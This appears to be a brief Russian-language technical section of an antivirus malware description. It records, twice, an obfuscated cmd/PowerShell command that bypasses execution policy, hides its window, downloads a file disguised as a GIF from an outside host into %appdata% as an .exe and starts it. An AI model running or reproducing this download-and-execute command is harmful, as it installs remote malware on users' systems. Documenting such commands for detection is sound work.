Техническая информация
- '<SYSTEM32>\cmd.exe' /c "pWERshell.exE -EXECUtIONPOlicY BYPAss -NPrOFIle -wiNDWstylE HiddeN (NEW-ObJEct sYSTEM.NET.WeBcliEnT).dWNlOADFIle('http://www.znedpesa.tp/read.php?f=1.gif','%aPpdAta%.exe');sta...
- '<SYSTEM32>\cmd.exe' /c "pWERshell.exE -EXECUtIONPOlicY BYPAss -NPrOFIle -wiNDWstylE HiddeN (NEW-ObJEct sYSTEM.NET.WeBcliEnT).dWNlOADFIle('http://www.znedpesa.tp/read.php?f=1.gif','%aPpdAta%.exe');sta...' (со скрытым окном)